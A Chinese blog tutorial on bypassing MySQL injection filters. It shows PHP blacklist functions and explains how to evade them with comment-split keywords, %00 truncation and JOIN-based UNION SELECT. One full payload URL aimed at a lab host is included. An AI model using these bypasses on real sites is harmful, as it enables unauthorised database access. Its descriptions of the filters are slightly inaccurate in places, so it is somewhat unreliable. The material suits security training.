2. 程式人生 > >19、注入篇————MYSQL過濾特殊符號的字元型注入方法

19、注入篇————MYSQL過濾特殊符號的字元型注入方法

阿新 發佈:2019-02-19

一、過濾了特殊符號的字元型注入

例如下面的過濾程式碼:

function blacklist($id)
{
	$id= preg_replace('/or/i',"", $id);			//strip out OR (non case sensitive)
	$id= preg_replace('/and/i',"", $id);		        //Strip out AND (non case sensitive)
	$id= preg_replace('/[\/\*]/',"", $id);		        //strip out /*
	$id= preg_replace('/[--]/',"", $id);		        //Strip out --
	$id= preg_replace('/[#]/',"", $id);			//Strip out #
	$id= preg_replace('/[\s]/',"", $id);		        //Strip out spaces
	$id= preg_replace('/[\/\\\\]/',"", $id);		//Strip out slashes
	return $id;
}

在這部分程式碼中過濾了“or”、“and”、“/”、“*”、“#”、“s”

繞過方法:

因為有過濾,所以order by \and 等命令都不能使用。

用o/**/rder來繞過or過濾

用a/**/nd 來繞過and過濾,或者使ID=0來強制報錯

把註釋改為;%00截斷

二、過濾了逗號的字元型注入

例如下面的過濾程式碼

function blacklist($id)
{
    if(stripos($id,',')){		//stripos函式作用:查詢 "php" 在字串中第一次出現的位置
      $id='1';
    }else{
      $id=$id;
    }
	return $id;
}

繞過方法

在注入語句中使用Join函式即可繞過

例如:

http://222.18.158.243:4604/?id=1' and 1=2 union select * from ( (select 1)a  JOIN  (select 2) b  JOIN (select 3) c )%23

相關推薦

19注入————MYSQL過濾特殊符號字元注入方法

一、過濾了特殊符號的字元型注入例如下面的過濾程式碼:function blacklist($id) { $id= preg_replace('/or/i',"", $id); //strip ou

linux的cutsort_wc_uniqtee_tr_split命令及一些特殊符號介紹

linux cut sort wc uniq tee shell特殊符號cut命令:1、* 任意個任意字符(這是一個通配符)2、? 任意一個字符3、 # 註釋字符4、 \ 脫義字符5、 | 管道符幾個和管道有關的命令:1、cut 分割,-d 分隔符 -f 指定段號 -c 指定第幾

用python進行資料預處理,過濾特殊符號,英文和數字。(適用於中文分詞)

要進行中文分詞,必須要求資料格式全部都是中文,需求過濾掉特殊符號、標點、英文、數字等。當然了使用者可以根據自己的要求過濾自定義字元。 實驗環境:python、mysql 實驗目的:從資料庫讀取資料,

防止javascript 注入攻擊 js過濾特殊字元

//匹配中文 數字 字母 下劃線       var checkInput = function (str) {     var pattern = /^[\w\u4e00-\u9fa5]+$/gi;   if(pattern.test(c))   {    return false;          

js傳中文和特殊符號到java處理方法

JavaWeb開發過程中從js通過Ajax傳遞引數到Controller層遇到的中文亂碼和特殊符號無法顯示的問題。 1.中文亂碼的處理方法: (1)在js頁面相關程式碼如下 var url ="這些是中文"; url=encodeURI(encodeURI(url));//

暑期練習web23:sqli lab第五關 雙注入GET單引號字元注入----基於bool的手工盲注

如果所查詢的使用者id在資料庫中,可以發現頁面顯示”You are in”,而不像前4關那樣會顯示出具體的賬號密碼 而如果輸入的查詢語句不存在,則什麼也不會返回 這裡普及一下盲注時的常用函式 1.mid()函式 mid(striing,start

sqli-labs—————Less-1(字元注入

前言從這一篇文章開始,我們將開始真正的講解Sqli-libs中的各種注入,從第1階層開始,後續的內容會陸續放出,歡迎各位大佬的關注與評論!Less-1首先,開啟主頁進入第一關:可以看到提示,提示我們要傳入一個引數,名為ID,而且是資料型別,那麼我就傳入該引數看看到這裡,我們可

sqli-labs less 1 (基於錯誤的GET單引號字元注入

基礎知識: 常用url編碼:空格%20,單引號%27,雙引號%22,#號%23 mysql常用註釋符:#...  ,--空格...  ,/*...*/,--+(某些情況+可以代替空格,+瀏覽器會編碼成空格) 常用工具:火狐的hackbar concat函式:連線一個或

高效能的敏感詞過濾演算法 可以忽略大小寫全半形簡繁體特殊符號干擾 (二)

/// <summary> /// 敏感詞過濾 已忽略大小寫 全半形 簡繁體差異 特殊符號 html標籤 干擾 /// </summary> public static class FilterKeyWords { priv

MySQL手工注入進階——突破過濾危險字元問題

當我們在進行手工注入時,有時候會發現咱們構造的危險字元被過濾了,接下來,我就教大家如何解決這個問題。下面是我的實戰過程。這裡使用的是墨者學院的線上靶場。咱們直接開始。 第一步,判斷注入點。 通過測試發現,這裡過濾了空格和等於號。所以咱們用/**/代替空格,用like代替=,最後將構造的語句進行url編碼,使用

js控制文本框只能輸入中文英文數字與指定特殊符號

code 中英文 text 數字0 控制文本框 右鍵 彈出 false 彈出菜單 原文:http://www.open-open.com/code/view/1433592419640 JS 控制文本框只能輸入數字 <input onkeyup="value=va

shell特殊符號cut命令sort_wc_uniq命令tee_tr_split命令shell特殊符號

linux 基礎 shell特殊符號* 任意個任意字符[root@test ~]# ls *.txt1.txt 23.txt 2.txt david.txt? 任意一個字符[root@test ~]# ls ?.txt1.txt 2.txt# 註釋字符[root@test ~]# #echo

shell特殊符號,cutsortwcuniqteetrsplit命令

shell特殊符號 cut、sort、wc、uniq、tee、tr、split命令 *代表0個或多個任意字符[root@localhost ~]# ls *txt11.txt 1.txt 22.txt 2.txt aa.txt a.txt ?只代表一個任意字符不管是數字還是字母,只要是一個

shell特殊符號cut_sort_wc_uniq命令和tee_tr_split命令

sort uniq cut wc shell特殊符號 shell特殊符號* 任意個任意字符? 任意一個字符# 註釋字符\ 脫義字符| 管道符$ 變量前綴 , !$ 組合,正則裏面表示行尾; 多條命令寫到一行,用分號分割~ 用戶家目錄,後面正則表達式表示匹配符& 放到命令後面,會把命

linux文件屬性特殊符號通配符通配符與正則的區別

linux運維 正則 文件屬性 特殊符號 作者:Georgekai歸檔:學習筆記2017/12/25 本章正題:linux文件屬性、特殊符號、通配符、通配符與正則的區別1.1 軟鏈接與硬連接的區別1.1.1 1.創建軟連接(怎麽來的)cp -s 或 ln -s 意思一樣1.1.2 2.創建硬鏈接(怎麽來的)l

特殊符號與管道相關的命令

ada pro roc color water cdb log ces e30 與管道相關的命令 特殊符號 特殊符號、與管道相關的命令

mysql設置復雜密碼中含$特殊符號導致無法命令登錄

mysql fff 符號 title 圖片 image sql 登錄 設置 安全考慮 在設置MYSQL 密碼時候加入了$特殊符號,導致在寫腳本時運行報以下錯誤如下經過一番折騰發現原來就是 $修改密碼即可去掉$mysql設置復雜密碼中含$特殊符號導致無法命令登錄

特殊符號存入mysql數據庫時報錯:Incorrect string value: 'xF0x9Fx98x84xF0x9F的解決方法

height blog quest back 輸入 數據庫字段 lan post value 問題描述:從新浪微博抓取消息保存到MySQL數據中,對應數據庫字段為varchar,字符編碼utf-8。部分插入成功,部分插入失敗,報錯如標題。在網上查詢,有人說是編碼問題,建議修

二十五shell特殊符號cut命令sort_wc_uniq命令 tee_tr_split命令

特殊符號 sort_wc_uniq命令 tee_tr_split命令 二十五、shell特殊符號cut命令、sort_wc_uniq命令、 tee_tr_split命令、 shell特殊符號下一、shell特殊符號cut命令特殊符號*:通配。?:任意一個字符。#:註釋字符,加在命令前面命令就不會

Linux學習筆記(二十五)shell特殊符號 sort_wc_uniqtee_tr_split

tee_tr_split命令一、特殊字符 1.‘* ‘任意個任意字符‘? ‘任意一個字符‘# ‘註釋字符‘ \ ‘脫義字符‘ | ‘管道符其中大部分之前都用過,對於脫義符‘\‘脫義符用法舉例如圖 2.幾個與管道有關的命令cut 分割,-d 分隔符 -f 指定段號 -c 指定第幾個字符 sort 排序,